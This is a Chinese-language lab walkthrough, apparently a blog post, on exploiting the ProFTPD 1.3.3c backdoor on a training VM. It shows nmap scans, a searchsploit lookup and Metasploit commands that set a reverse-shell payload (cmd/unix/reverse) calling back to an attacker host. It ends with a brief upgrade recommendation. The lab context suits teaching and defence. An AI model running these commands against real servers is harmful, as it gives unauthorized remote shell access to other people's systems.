FTP服务后门实战

影响范围

ProFTPD 1.3.3c

漏洞介绍

ProFTPD是一种高度可定制和可扩展的FTP服务器软件,它提供了一种安全和可靠的方式来传输文件和数据,它支持多种操作系统,包括类Unix系统(例如:Linux、FreeBSD等)和Windows,在其1.3.3c软件包中存在一处命令执行的后门漏洞,攻击者可以直接进行命令执行获取服务器端的Shell权限

漏洞利用

这里以"basic_pentesting_1"靶机中的ProFTPD 1.3.3c版本为例进行漏洞的检测与利用,首先执行以下命令来获取目标主机的IP地址信息

nmap -sn 192.168.204.0/24

服务端口扫描:

nmap -A -T4 -v 192.168.204.144

从上面的扫描结果可以看到目标服务器开启了21、22、80端口,而且注意到目标服务器中的FTP服务版本为ProFTPD 1.3.3c,所以我们可以直接利用该服务对应的漏洞对目标服务器实施攻击操作,首先我们使用searchsploit进行漏洞的检索操作

searchsploit ProFTOD 1.3.3c

随后我们直接在MSF中检索漏洞利用模块

msfconsole
search ProFTOD 1.3.3c

msf6 exploit(unix/ftp/proftpd_133c_backdoor) > set RHOSTS 192.168.204.144
RHOSTS => 192.168.204.144
msf6 exploit(unix/ftp/proftpd_133c_backdoor) > set RPORT 21
RPORT => 21
msf6 exploit(unix/ftp/proftpd_133c_backdoor) > set payload cmd/unix/reverse
payload => cmd/unix/reverse
msf6 exploit(unix/ftp/proftpd_133c_backdoor) > set lhost 192.168.204.135
lhost => 192.168.204.135
msf6 exploit(unix/ftp/proftpd_133c_backdoor) > show options

随后执行载荷并成功获取到目标服务器的权限

修复建议

升级到FTPD的最新版本

参考连接

https://www.cnvd.org.cn/flaw/show/CNVD-2010-3023

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

FLy_鹏程万里

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值